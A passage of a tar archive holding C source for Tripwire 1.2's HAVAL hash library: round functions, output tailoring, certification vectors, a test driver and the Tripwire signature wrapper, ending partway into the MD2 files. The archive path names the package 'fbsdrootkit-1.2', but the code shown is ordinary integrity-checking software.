t1, t0, t7, t6, t5, t4, *(w+11), 0xC0AC29B7); FF_2(t2, t1, t0, t7, t6, t5, t4, t3, *(w+28), 0xC97C50DD); FF_2(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 7), 0x3F84D5B5); FF_2(t0, t7, t6, t5, t4, t3, t2, t1, *(w+16), 0xB5470917); FF_2(t7, t6, t5, t4, t3, t2, t1, t0, *(w ), 0x9216D5D9); FF_2(t6, t5, t4, t3, t2, t1, t0, t7, *(w+23), 0x8979FB1B); FF_2(t5, t4, t3, t2, t1, t0, t7, t6, *(w+20), 0xD1310BA6); FF_2(t4, t3, t2, t1, t0, t7, t6, t5, *(w+22), 0x98DFB5AC); FF_2(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 1), 0x2FFD72DB); FF_2(t2, t1, t0, t7, t6, t5, t4, t3, *(w+10), 0xD01ADFB7); FF_2(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 4), 0xB8E1AFED); FF_2(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 8), 0x6A267E96); FF_2(t7, t6, t5, t4, t3, t2, t1, t0, *(w+30), 0xBA7C9045); FF_2(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 3), 0xF12C7F99); FF_2(t5, t4, t3, t2, t1, t0, t7, t6, *(w+21), 0x24A19947); FF_2(t4, t3, t2, t1, t0, t7, t6, t5, *(w+ 9), 0xB3916CF7); FF_2(t3, t2, t1, t0, t7, t6, t5, t4, *(w+17), 0x0801F2E2); FF_2(t2, t1, t0, t7, t6, t5, t4, t3, *(w+24), 0x858EFC16); FF_2(t1, t0, t7, t6, t5, t4, t3, t2, *(w+29), 
0x636920D8); FF_2(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 6), 0x71574E69); FF_2(t7, t6, t5, t4, t3, t2, t1, t0, *(w+19), 0xA458FEA3); FF_2(t6, t5, t4, t3, t2, t1, t0, t7, *(w+12), 0xF4933D7E); FF_2(t5, t4, t3, t2, t1, t0, t7, t6, *(w+15), 0x0D95748F); FF_2(t4, t3, t2, t1, t0, t7, t6, t5, *(w+13), 0x728EB658); FF_2(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 2), 0x718BCD58); FF_2(t2, t1, t0, t7, t6, t5, t4, t3, *(w+25), 0x82154AEE); FF_2(t1, t0, t7, t6, t5, t4, t3, t2, *(w+31), 0x7B54A41D); FF_2(t0, t7, t6, t5, t4, t3, t2, t1, *(w+27), 0xC25A59B5); /* Pass 3 */ FF_3(t7, t6, t5, t4, t3, t2, t1, t0, *(w+19), 0x9C30D539); FF_3(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 9), 0x2AF26013); FF_3(t5, t4, t3, t2, t1, t0, t7, t6, *(w+ 4), 0xC5D1B023); FF_3(t4, t3, t2, t1, t0, t7, t6, t5, *(w+20), 0x286085F0); FF_3(t3, t2, t1, t0, t7, t6, t5, t4, *(w+28), 0xCA417918); FF_3(t2, t1, t0, t7, t6, t5, t4, t3, *(w+17), 0xB8DB38EF); FF_3(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 8), 0x8E79DCB0); FF_3(t0, t7, t6, t5, t4, t3, t2, t1, *(w+22), 0x603A180E); FF_3(t7, t6, t5, t4, t3, t2, t1, t0, *(w+29), 0x6C9E0E8B); FF_3(t6, t5, t4, t3, t2, t1, t0, t7, *(w+14), 0xB01E8A3E); FF_3(t5, t4, t3, t2, t1, t0, t7, t6, *(w+25), 0xD71577C1); FF_3(t4, t3, t2, t1, t0, t7, t6, t5, *(w+12), 0xBD314B27); FF_3(t3, t2, t1, t0, t7, t6, t5, t4, *(w+24), 0x78AF2FDA); FF_3(t2, t1, t0, t7, t6, t5, t4, t3, *(w+30), 0x55605C60); FF_3(t1, t0, t7, t6, t5, t4, t3, t2, *(w+16), 0xE65525F3); FF_3(t0, t7, t6, t5, t4, t3, t2, t1, *(w+26), 0xAA55AB94); FF_3(t7, t6, t5, t4, t3, t2, t1, t0, *(w+31), 0x57489862); FF_3(t6, t5, t4, t3, t2, t1, t0, t7, *(w+15), 0x63E81440); FF_3(t5, t4, t3, t2, t1, t0, t7, t6, *(w+ 7), 0x55CA396A); FF_3(t4, t3, t2, t1, t0, t7, t6, t5, *(w+ 3), 0x2AAB10B6); FF_3(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 1), 0xB4CC5C34); FF_3(t2, t1, t0, t7, t6, t5, t4, t3, *(w ), 0x1141E8CE); FF_3(t1, t0, t7, t6, t5, t4, t3, t2, *(w+18), 0xA15486AF); FF_3(t0, t7, t6, t5, t4, t3, t2, t1, *(w+27), 0x7C72E993); FF_3(t7, t6, t5, t4, t3, t2, 
t1, t0, *(w+13), 0xB3EE1411); FF_3(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 6), 0x636FBC2A); FF_3(t5, t4, t3, t2, t1, t0, t7, t6, *(w+21), 0x2BA9C55D); FF_3(t4, t3, t2, t1, t0, t7, t6, t5, *(w+10), 0x741831F6); FF_3(t3, t2, t1, t0, t7, t6, t5, t4, *(w+23), 0xCE5C3E16); FF_3(t2, t1, t0, t7, t6, t5, t4, t3, *(w+11), 0x9B87931E); FF_3(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 5), 0xAFD6BA33); FF_3(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 2), 0x6C24CF5C); #if PASS >= 4 /* Pass 4. executed only when PASS =4 or 5 */ FF_4(t7, t6, t5, t4, t3, t2, t1, t0, *(w+24), 0x7A325381); FF_4(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 4), 0x28958677); FF_4(t5, t4, t3, t2, t1, t0, t7, t6, *(w ), 0x3B8F4898); FF_4(t4, t3, t2, t1, t0, t7, t6, t5, *(w+14), 0x6B4BB9AF); FF_4(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 2), 0xC4BFE81B); FF_4(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 7), 0x66282193); FF_4(t1, t0, t7, t6, t5, t4, t3, t2, *(w+28), 0x61D809CC); FF_4(t0, t7, t6, t5, t4, t3, t2, t1, *(w+23), 0xFB21A991); FF_4(t7, t6, t5, t4, t3, t2, t1, t0, *(w+26), 0x487CAC60); FF_4(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 6), 0x5DEC8032); FF_4(t5, t4, t3, t2, t1, t0, t7, t6, *(w+30), 0xEF845D5D); FF_4(t4, t3, t2, t1, t0, t7, t6, t5, *(w+20), 0xE98575B1); FF_4(t3, t2, t1, t0, t7, t6, t5, t4, *(w+18), 0xDC262302); FF_4(t2, t1, t0, t7, t6, t5, t4, t3, *(w+25), 0xEB651B88); FF_4(t1, t0, t7, t6, t5, t4, t3, t2, *(w+19), 0x23893E81); FF_4(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 3), 0xD396ACC5); FF_4(t7, t6, t5, t4, t3, t2, t1, t0, *(w+22), 0x0F6D6FF3); FF_4(t6, t5, t4, t3, t2, t1, t0, t7, *(w+11), 0x83F44239); FF_4(t5, t4, t3, t2, t1, t0, t7, t6, *(w+31), 0x2E0B4482); FF_4(t4, t3, t2, t1, t0, t7, t6, t5, *(w+21), 0xA4842004); FF_4(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 8), 0x69C8F04A); FF_4(t2, t1, t0, t7, t6, t5, t4, t3, *(w+27), 0x9E1F9B5E); FF_4(t1, t0, t7, t6, t5, t4, t3, t2, *(w+12), 0x21C66842); FF_4(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 9), 0xF6E96C9A); FF_4(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 1), 0x670C9C61); FF_4(t6, t5, t4, t3, 
t2, t1, t0, t7, *(w+29), 0xABD388F0); FF_4(t5, t4, t3, t2, t1, t0, t7, t6, *(w+ 5), 0x6A51A0D2); FF_4(t4, t3, t2, t1, t0, t7, t6, t5, *(w+15), 0xD8542F68); FF_4(t3, t2, t1, t0, t7, t6, t5, t4, *(w+17), 0x960FA728); FF_4(t2, t1, t0, t7, t6, t5, t4, t3, *(w+10), 0xAB5133A3); FF_4(t1, t0, t7, t6, t5, t4, t3, t2, *(w+16), 0x6EEF0B6C); FF_4(t0, t7, t6, t5, t4, t3, t2, t1, *(w+13), 0x137A3BE4); #endif #if PASS == 5 /* Pass 5. executed only when PASS = 5 */ FF_5(t7, t6, t5, t4, t3, t2, t1, t0, *(w+27), 0xBA3BF050); FF_5(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 3), 0x7EFB2A98); FF_5(t5, t4, t3, t2, t1, t0, t7, t6, *(w+21), 0xA1F1651D); FF_5(t4, t3, t2, t1, t0, t7, t6, t5, *(w+26), 0x39AF0176); FF_5(t3, t2, t1, t0, t7, t6, t5, t4, *(w+17), 0x66CA593E); FF_5(t2, t1, t0, t7, t6, t5, t4, t3, *(w+11), 0x82430E88); FF_5(t1, t0, t7, t6, t5, t4, t3, t2, *(w+20), 0x8CEE8619); FF_5(t0, t7, t6, t5, t4, t3, t2, t1, *(w+29), 0x456F9FB4); FF_5(t7, t6, t5, t4, t3, t2, t1, t0, *(w+19), 0x7D84A5C3); FF_5(t6, t5, t4, t3, t2, t1, t0, t7, *(w ), 0x3B8B5EBE); FF_5(t5, t4, t3, t2, t1, t0, t7, t6, *(w+12), 0xE06F75D8); FF_5(t4, t3, t2, t1, t0, t7, t6, t5, *(w+ 7), 0x85C12073); FF_5(t3, t2, t1, t0, t7, t6, t5, t4, *(w+13), 0x401A449F); FF_5(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 8), 0x56C16AA6); FF_5(t1, t0, t7, t6, t5, t4, t3, t2, *(w+31), 0x4ED3AA62); FF_5(t0, t7, t6, t5, t4, t3, t2, t1, *(w+10), 0x363F7706); FF_5(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 5), 0x1BFEDF72); FF_5(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 9), 0x429B023D); FF_5(t5, t4, t3, t2, t1, t0, t7, t6, *(w+14), 0x37D0D724); FF_5(t4, t3, t2, t1, t0, t7, t6, t5, *(w+30), 0xD00A1248); FF_5(t3, t2, t1, t0, t7, t6, t5, t4, *(w+18), 0xDB0FEAD3); FF_5(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 6), 0x49F1C09B); FF_5(t1, t0, t7, t6, t5, t4, t3, t2, *(w+28), 0x075372C9); FF_5(t0, t7, t6, t5, t4, t3, t2, t1, *(w+24), 0x80991B7B); FF_5(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 2), 0x25D479D8); FF_5(t6, t5, t4, t3, t2, t1, t0, t7, *(w+23), 0xF6E8DEF7); FF_5(t5, t4, 
t3, t2, t1, t0, t7, t6, *(w+16), 0xE3FE501A); FF_5(t4, t3, t2, t1, t0, t7, t6, t5, *(w+22), 0xB6794C3B); FF_5(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 4), 0x976CE0BD); FF_5(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 1), 0x04C006BA); FF_5(t1, t0, t7, t6, t5, t4, t3, t2, *(w+25), 0xC1A94FB6); FF_5(t0, t7, t6, t5, t4, t3, t2, t1, *(w+15), 0x409F60C4); #endif state->fingerprint[0] += t0; state->fingerprint[1] += t1; state->fingerprint[2] += t2; state->fingerprint[3] += t3; state->fingerprint[4] += t4; state->fingerprint[5] += t5; state->fingerprint[6] += t6; state->fingerprint[7] += t7; } /* tailor the last output */ static void haval_tailor (state) haval_state *state; { haval_word temp; #if FPTLEN == 128 temp = (state->fingerprint[7] & 0x000000FF) | (state->fingerprint[6] & 0xFF000000) | (state->fingerprint[5] & 0x00FF0000) | (state->fingerprint[4] & 0x0000FF00); state->fingerprint[0] += rotate_right(temp, 8); temp = (state->fingerprint[7] & 0x0000FF00) | (state->fingerprint[6] & 0x000000FF) | (state->fingerprint[5] & 0xFF000000) | (state->fingerprint[4] & 0x00FF0000); state->fingerprint[1] += rotate_right(temp, 16); temp = (state->fingerprint[7] & 0x00FF0000) | (state->fingerprint[6] & 0x0000FF00) | (state->fingerprint[5] & 0x000000FF) | (state->fingerprint[4] & 0xFF000000); state->fingerprint[2] += rotate_right(temp, 24); temp = (state->fingerprint[7] & 0xFF000000) | (state->fingerprint[6] & 0x00FF0000) | (state->fingerprint[5] & 0x0000FF00) | (state->fingerprint[4] & 0x000000FF); state->fingerprint[3] += temp; #endif #if FPTLEN == 160 temp = (state->fingerprint[7] & (haval_word)0x3F) | (state->fingerprint[6] & ((haval_word)0x7F << 25)) | (state->fingerprint[5] & ((haval_word)0x3F << 19)); state->fingerprint[0] += rotate_right(temp, 19); temp = (state->fingerprint[7] & ((haval_word)0x3F << 6)) | (state->fingerprint[6] & (haval_word)0x3F) | (state->fingerprint[5] & ((haval_word)0x7F << 25)); state->fingerprint[1] += rotate_right(temp, 25); temp = (state->fingerprint[7] & 
((haval_word)0x7F << 12)) | (state->fingerprint[6] & ((haval_word)0x3F << 6)) | (state->fingerprint[5] & (haval_word)0x3F); state->fingerprint[2] += temp; temp = (state->fingerprint[7] & ((haval_word)0x3F << 19)) | (state->fingerprint[6] & ((haval_word)0x7F << 12)) | (state->fingerprint[5] & ((haval_word)0x3F << 6)); state->fingerprint[3] += temp >> 6; temp = (state->fingerprint[7] & ((haval_word)0x7F << 25)) | (state->fingerprint[6] & ((haval_word)0x3F << 19)) | (state->fingerprint[5] & ((haval_word)0x7F << 12)); state->fingerprint[4] += temp >> 12; #endif #if FPTLEN == 192 temp = (state->fingerprint[7] & (haval_word)0x1F) | (state->fingerprint[6] & ((haval_word)0x3F << 26)); state->fingerprint[0] += rotate_right(temp, 26); temp = (state->fingerprint[7] & ((haval_word)0x1F << 5)) | (state->fingerprint[6] & (haval_word)0x1F); state->fingerprint[1] += temp; temp = (state->fingerprint[7] & ((haval_word)0x3F << 10)) | (state->fingerprint[6] & ((haval_word)0x1F << 5)); state->fingerprint[2] += temp >> 5; temp = (state->fingerprint[7] & ((haval_word)0x1F << 16)) | (state->fingerprint[6] & ((haval_word)0x3F << 10)); state->fingerprint[3] += temp >> 10; temp = (state->fingerprint[7] & ((haval_word)0x1F << 21)) | (state->fingerprint[6] & ((haval_word)0x1F << 16)); state->fingerprint[4] += temp >> 16; temp = (state->fingerprint[7] & ((haval_word)0x3F << 26)) | (state->fingerprint[6] & ((haval_word)0x1F << 21)); state->fingerprint[5] += temp >> 21; #endif #if FPTLEN == 224 state->fingerprint[0] += (state->fingerprint[7] >> 27) & 0x1F; state->fingerprint[1] += (state->fingerprint[7] >> 22) & 0x1F; state->fingerprint[2] += (state->fingerprint[7] >> 18) & 0x0F; state->fingerprint[3] += (state->fingerprint[7] >> 13) & 0x1F; state->fingerprint[4] += (state->fingerprint[7] >> 9) & 0x0F; state->fingerprint[5] += (state->fingerprint[7] >> 4) & 0x1F; state->fingerprint[6] += state->fingerprint[7] & 0x0F; #endif } fbsdrootkit-1.2/tripwire-1.2/sigs/haval/haval.cert100600 764 764 1276 
5611466356 17332 0ustar dfdf/* haval.cert */ HAVAL (V.1) CERTIFICATION DATA ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ PASS=3, FPTLEN=128: HAVAL("") = 1BDC556B29AD02EC09AF8C66477F2A87 PASS=3, FPTLEN=160: HAVAL("a") = 5E1610FCED1D3ADB0BB18E92AC2B11F0BD99D8ED PASS=4, FPTLEN=192: HAVAL("HAVAL") = 74AA31182FF09BCCE453A7F71B5A7C5E80872FA90CD93AE4 PASS=4, FPTLEN=224: HAVAL("0123456789") = 144CB2DE11F05DF7C356282A3B485796DA653F6B702868C7DCF4AE76 PASS=5, FPTLEN=256: HAVAL("abcdefghijklmnopqrstuvwxyz") = 1A1DC8099BDAA7F35B4DA4E805F1A28FEE909D8DEE920198185CBCAED8A10A8D HAVAL("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789") = C5647FC6C1877FFF96742F27E9266B6874894F41A08F5913033D9D532AEDDB39 fbsdrootkit-1.2/tripwire-1.2/sigs/haval/haval.h100600 764 764 4620 5611466357 16621 0ustar dfdf/* * haval.h: specifies the interface to the HAVAL (V.1) hashing library. * * HAVAL is a one-way hashing algorithm with the following * collision-resistant property: * It is computationally infeasible to find two or more * messages that are hashed into the same fingerprint. * * Reference: * Y. Zheng, J. Pieprzyk and J. Seberry: * ``HAVAL --- a one-way hashing algorithm with variable * length of output'', Advances in Cryptology --- AUSCRYPT'92, * Lecture Notes in Computer Science, Springer-Verlag, 1993. * * This library provides routines to hash * - a string, * - a file, * - input from the standard input device, * - a 32-word block, and * - a string of specified length. * * Author: Yuliang Zheng * Department of Computer Science * University of Wollongong * Wollongong, NSW 2522, Australia * Email: yuliang@cs.uow.edu.au * Voice: +61 42 21 4331 (office) * * Date: June 1993 * * Copyright (C) 1993 by C^3SR. All rights reserved. * This program may not be sold or used as inducement to * buy a product without the written permission of C^3SR. 
*/ typedef uint32 haval_word; /* a HAVAL word = 32 bits */ typedef struct { haval_word count[2]; /* number of bits in a message */ haval_word fingerprint[8]; /* current state of fingerprint */ haval_word block[32]; /* buffer for a 32-word block */ unsigned char remainder[32*4]; /* unhashed chars (No.<128) */ } haval_state; /* Do not remove this line. Protyping depends on it! */ #if defined(__STDC__) || defined(__cplusplus) #define P_(s) s #else #define P_(s) () #endif void haval_string P_((char *, unsigned char *)); /* hash a string */ int haval_file P_((char *, unsigned char *)); /* hash a file */ void haval_stdin P_((void)); /* filter -- hash input from stdin */ void haval_start P_((haval_state *)); /* initialization */ void haval_hash P_((haval_state *, unsigned char *, unsigned int)); /* updating routine */ void haval_end P_((haval_state *, unsigned char *)); /* finalization */ void haval_hash_block P_((haval_state *)); /* hash a 32-word block */ /* this is the Tripwire hook */ int sig_haval_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/haval/havalapp.h100600 764 764 2030 5620062031 17270 0ustar dfdf/* * havalapp.h: specifies the following three constants needed to * compile the HAVAL hashing library: * TW_LITTLE_ENDIAN, PASS and FPTLEN * * Descriptions: * * TW_LITTLE_ENDIAN define this only if your machine is little-endian * (such as 80X86 family). * * Note: * 1. In general, HAVAL is faster on a little endian * machine than on a big endian one. * * 2. The test program "havaltest.c" provides an option * for testing the endianity of your machine. * * 3. The speed of HAVAL is even more remarkable on a * machine that has a large number of internal registers. 
*
 *      PASS            define the number of passes (3, 4, or 5)
 *      FPTLEN          define the length of a fingerprint (128, 160, 192, 224 or 256)
 */

/*
 * Forced off for the Tripwire build.  haval.c as shipped here chooses its
 * byte-order path with "#if BYTEORDER == 0x1234", taking BYTEORDER from
 * ../../include/byteorder.h, rather than from this macro.
 */
#undef TW_LITTLE_ENDIAN

/*
 * The two defaults below are the smallest values the library accepts and can
 * be overridden from the compiler command line.  Any change alters every
 * HAVAL signature produced, so signatures already stored with the old
 * settings will no longer match.
 *
 * NOTE(review): collision attacks have since been published against 3-pass
 * HAVAL and against the 128-bit output, so PASS=3 / FPTLEN=128 is the weakest
 * configuration on offer.  Where the signature is meant to resist deliberate
 * tampering, prefer the largest settings or pair it with a stronger
 * signature routine.
 */
#ifndef PASS
#define PASS       3        /* 3, 4, or 5 */
#endif

#ifndef FPTLEN
#define FPTLEN     128      /* 128, 160, 192, 224 or 256 */
#endif
fbsdrootkit-1.2/tripwire-1.2/sigs/haval/havaltest.c100600 764 764 14750 5620062033 17520 0ustar dfdf
/*
 *  havaltest.c:  specifies a test program for the HAVAL hashing library.
 *
 *  Arguments for the test program:
 *
 *      (none)    - hash input from stdin
 *      ? or -?   - show help menu
 *      -c        - hash certification data
 *      -e        - test whether your machine is little-endian
 *      -mstring  - hash message (string of chars)
 *      -s        - test speed
 *      file_name - hash file
 *
 *  Makefile for the testing program:
 *
 *         CC=acc
 *         CFLAGS=-fast
 *
 *         haval: haval.o havaltest.o
 *                ${CC} ${CFLAGS} haval.o havaltest.o -o $@
 *         haval.o havaltest.o: havalapp.h
 *
 *         clean:
 *                /usr/bin/rm -f *.o haval
 *
 *  Author:     Yuliang Zheng
 *              Department of Computer Science
 *              University of Wollongong
 *              Wollongong, NSW 2522, Australia
 *              Email: yuliang@cs.uow.edu.au
 *              Voice: +61 42 21 4331 (office)
 *
 *  Date:       June 1993
 *
 *      Copyright (C) 1993 by C^3SR. All rights reserved.
 *      This program may not be sold or used as inducement to
 *      buy a product without the written permission of C^3SR.
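*/

#include "../../include/config.h"
#include
#include
#include
#include "havalapp.h"
#include "haval.h"

#define NUMBER_OF_BLOCKS 5000               /* number of test blocks */
#define BLOCK_SIZE       1000               /* number of bytes in a block */

static void haval_speed (void);             /* test the speed of HAVAL */
static void haval_cert (void);              /* hash test data set */
static void haval_print (unsigned char *);  /* print a fingerprint */
static int  little_endian (void);           /* test endianity */

/*
 * Command-line driver: with no arguments it filters stdin through
 * haval_stdin(); otherwise each argument selects help, -mstring, -c, -s, -e
 * or names a file to hash.  Always returns 0.
 */
int main (argc, argv)
  int  argc;
  char *argv[];
{
  int           i;
  unsigned char fingerprint[FPTLEN >> 3];

  if (argc <= 1) {
    haval_stdin ();                                /* filter */
  }
  for (i = 1; i < argc; i++) {
    if ((argv[i][0] == '?') ||                      /* show help info */
        (argv[i][0] == '-' && argv[i][1] == '?')) {
      printf (" (none) hash input from stdin\n");
      printf (" ? or -? show help menu\n");
      printf (" -c hash certification data\n");
      printf (" -e test endianity\n");
      printf (" -mstring hash message\n");
      printf (" -s test speed\n");
      printf (" file_name hash file\n");
    } else if (argv[i][0] == '-' && argv[i][1] == 'm') {  /* hash string */
      haval_string (argv[i]+2, fingerprint);
      printf ("HAVAL(\"%s\") = ", argv[i]+2);
      haval_print (fingerprint);
      printf ("\n");
    } else if (strcmp (argv[i], "-c") == 0) {      /* hash test set */
      haval_cert ();
    } else if (strcmp (argv[i], "-s") == 0) {      /* test speed */
      haval_speed ();
    } else if (strcmp (argv[i], "-e") == 0) {      /* test endianity */
      if (little_endian()) {
        printf ("Your machine is little-endian.\n");
        printf ("You may define TW_LITTLE_ENDIAN to speed up processing.\n");
      } else {
        printf ("Your machine is NOT little-endian.\n");
        printf ("You must NOT define TW_LITTLE_ENDIAN.\n");
      }
    } else {                                       /* hash file */
      if (haval_file (argv[i], fingerprint)) {
        printf ("%s can not be opened !\n= ", argv[i]);
      } else {
        printf ("HAVAL(File %s) = ", argv[i]);
        haval_print (fingerprint);
        printf ("\n");
      }
    }
  }
  return (0);
}

/*
 * test the speed of HAVAL
 *
 * Hashes NUMBER_OF_BLOCKS blocks of BLOCK_SIZE bytes and prints the rate.
 * Timing uses time(), so the resolution is one second; a run shorter than
 * that prints "not enough blocks !".
 */
static void haval_speed (void)
{
  haval_state   state;
  unsigned char buff[BLOCK_SIZE];
  unsigned char fingerprint[FPTLEN >> 3];
  time_t        start_time, end_time;
  double        elapsed_time;
  unsigned int  i;

  printf ("Test the speed of HAVAL (PASS = %d, FPTLEN = %d bits).\n", PASS, FPTLEN);
  printf ("Hashing %d %d-byte blocks ...\n", NUMBER_OF_BLOCKS, BLOCK_SIZE);

  /* initialize test block */
  for (i = 0; i < BLOCK_SIZE; i++) {
    buff[i] = ~0;
  }

  /* get start time */
  time (&start_time);

  /* hash */
  haval_start (&state);
  for (i = 0; i < NUMBER_OF_BLOCKS; i++) {
    haval_hash (&state, buff, BLOCK_SIZE);
  }
  haval_end (&state, fingerprint);

  /* get end time */
  time (&end_time);

  /* get elapsed time */
  /* elapsed_time = difftime(end_time, start_time); */
  elapsed_time = end_time - start_time;

  if (elapsed_time > 0.0) {
    printf ("Elapsed Time = %3.1f seconds\n", elapsed_time);
    printf (" Speed = %4.2f MBPS (megabits/second)\n",
    (NUMBER_OF_BLOCKS * BLOCK_SIZE * 8)/(1.0E6 * elapsed_time));
  } else {
    printf ("not enough blocks !\n");
  }
}

/*
 * hash a set of certification data and print the results.
 * The output is meant to be compared by eye with haval.cert for the
 * PASS/FPTLEN pair the program was built with.
 */
static void haval_cert (void)
{
  char          *str;
  unsigned char fingerprint[FPTLEN >> 3];

  printf ("\n");
  printf ("HAVAL certification data (PASS=%d, FPTLEN=%d):", PASS, FPTLEN);
  printf ("\n");

  str = "";
  haval_string (str, fingerprint);
  printf ("HAVAL(\"%s\") = ", str);
  haval_print (fingerprint);
  printf ("\n");

  str = "a";
  haval_string (str, fingerprint);
  printf ("HAVAL(\"%s\") = ", str);
  haval_print (fingerprint);
  printf ("\n");

  str = "HAVAL";
  haval_string (str, fingerprint);
  printf ("HAVAL(\"%s\") = ", str);
  haval_print (fingerprint);
  printf ("\n");

  str = "0123456789";
  haval_string (str, fingerprint);
  printf ("HAVAL(\"%s\") = ", str);
  haval_print (fingerprint);
  printf ("\n");

  str = "abcdefghijklmnopqrstuvwxyz";
  haval_string (str, fingerprint);
  printf ("HAVAL(\"%s\") = ", str);
  haval_print (fingerprint);
  printf ("\n");

  str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  haval_string (str, fingerprint);
  printf ("HAVAL(\"%s\")\n = ", str);
  haval_print (fingerprint);
  printf ("\n");

  str = "pi.frac";
  if (haval_file (str, fingerprint)) {
    printf ("%s can not be opened !\n", str);
  } else {
    printf ("HAVAL(File %s) = ", str);
    haval_print (fingerprint);
    printf ("\n");
  }
}

/*
 * test endianity
 *
 * Returns 1 when the lowest-addressed byte of an integer holds its least
 * significant bits, 0 otherwise.  The earlier version read a 4-byte char
 * array through an unsigned long pointer, which reads past the array where
 * long is 8 bytes and is not a permitted way to access the array; looking at
 * an integer through an unsigned char pointer answers the same question.
 */
static int little_endian(void)
{
  unsigned long probe = 1;

  return (*(unsigned char *)&probe == 1);
}

/* print a fingerprint in hexadecimal */
static void haval_print (unsigned char fingerprint[FPTLEN >> 3])
{
  int i;

  for (i = 0; i < FPTLEN >> 3; i++) {
    printf ("%02X", fingerprint[i]);
  }
}
fbsdrootkit-1.2/tripwire-1.2/sigs/haval/havalwrapper.c100600 764 764 3474 5614757133 20221 0ustar dfdf
#ifndef lint
static char rcsid[] = "$Id: havalwrapper.c,v 1.4 1994/07/25 15:46:35 gkim Exp $";
#endif

/*
 * havalwrapper.c
 *
 *	signature function hook for Haval.
 *
 * Gene Kim
 */

#include "../../include/config.h"
#include
#include
#ifdef STDLIBH
#include
#include
#endif
#ifdef STRINGH
#include
#else
#include
#endif
#include "../../include/sigs.h"
#include "havalapp.h"
#include "haval.h"

#define BUFSIZE 1024		/* limit of in-struct buffer size */

char *btob64();

/*
 * int
 * pf_signature(int fd_in, char *ps_signature, int siglen)
 *
 *	fd_in: 		pointer to input file descriptor
 *	ps_signature: 	pointer to array where signature will be stored
 *	siglen: 	length of the signature array (for overflow checking)
 *
 * Hashes the whole file behind fd_in with HAVAL and stores the result in
 * ps_signature as a NUL-terminated string: 2 * (FPTLEN >> 3) hex digits
 * when printhex is set, otherwise whatever btob64() produces.
 *
 * Returns 0 on success and -1 when siglen is too small for the hex form
 * (siglen was documented as an overflow check but was never consulted).
 * A failing fdopen() or a read error prints a message and exits.
 *
 * NOTE(review): btob64() is not given siglen; confirm that its output for
 * numbytes * 8 bits always fits the buffer callers pass.
 */
int
sig_haval_get (fd_in, ps_signature, siglen)
    int fd_in;
    char *ps_signature;
    int siglen;
{
    unsigned char 	buffer[BUFSIZE];
    size_t		readin;
    int 		i;
    haval_state		state;
    FILE		*fp;
    unsigned char	fingerprint[1024];
    int			numbytes = FPTLEN >> 3;

    /* refuse a buffer that cannot hold the terminator or the hex digits */
    if (siglen <= 0 || (printhex && siglen < 2 * numbytes + 1))
	return -1;

    ps_signature[0] = '\0';

    /* get stdio handle
     * 		we use dup() so we can close() it later
     */
    if (!(fp = (FILE *) fdopen(dup(fd_in), "rb"))) {
	perror("sig_haval_get: fdopen()");
	exit(1);
    }

    /* rewind the file descriptor */
    rewind(fp);

    haval_start(&state);
    while ((readin = fread(buffer, 1, BUFSIZE, fp)) > 0) {
	/* readin is at most BUFSIZE, so the narrowing is safe */
	haval_hash(&state, buffer, (unsigned int) readin);
    }
    /*
     * fread() returns a count and never a negative value, so the old
     * "readin < 0" test could not fire and a read error was hashed as if
     * the file had simply ended.  ferror() is the way to tell the two apart.
     */
    if (ferror(fp)) {
	perror("sig_haval_get: fread()");
	exit(1);
    }
    haval_end(&state, fingerprint);

    if (printhex) {
	char *pc = ps_signature;

	/* room for 2 * numbytes digits plus NUL was checked on entry */
	for (i = 0; i < numbytes; i++) {
	    sprintf(pc, "%02x", fingerprint[i] & 0xff);
	    pc += 2;
	}
	*pc = '\0';
    }
    else {
	btob64(fingerprint, ps_signature, numbytes * 8);
    }

    fclose(fp);
    return 0;
}
fbsdrootkit-1.2/tripwire-1.2/sigs/md2/ 40700 764 764 0 5630552015 14627 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/md2/Makefile100600 764 764 445 5474057126 16362 0ustar dfdf# $Id: Makefile,v 1.3 1993/11/22 06:38:14 genek Exp $ # # Makefile for MD2 wrapper # # Gene Kim # Purdue University # October 18, 1992 # all: md2wrapper.o md2.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -rf *.o .pure md2.o: ../../include/byteorder.h md2wrapper.o: ../../include/byteorder.h fbsdrootkit-1.2/tripwire-1.2/sigs/md2/global.h100600 764 764 1530 5434607530 16343 0ustar dfdf
/* $Id: global.h,v 1.2 1993/08/19 05:27:52 genek Exp $ */

/* GLOBAL.H - RSAREF types and constants
 */

/* PROTOTYPES should be set to one if and only if the compiler supports
     function argument prototyping.
   The following makes PROTOTYPES default to 0 if it has not already
     been defined with C compiler flags.
 */
#ifndef PROTOTYPES
#define PROTOTYPES 0
#endif

/* POINTER defines a generic pointer type */
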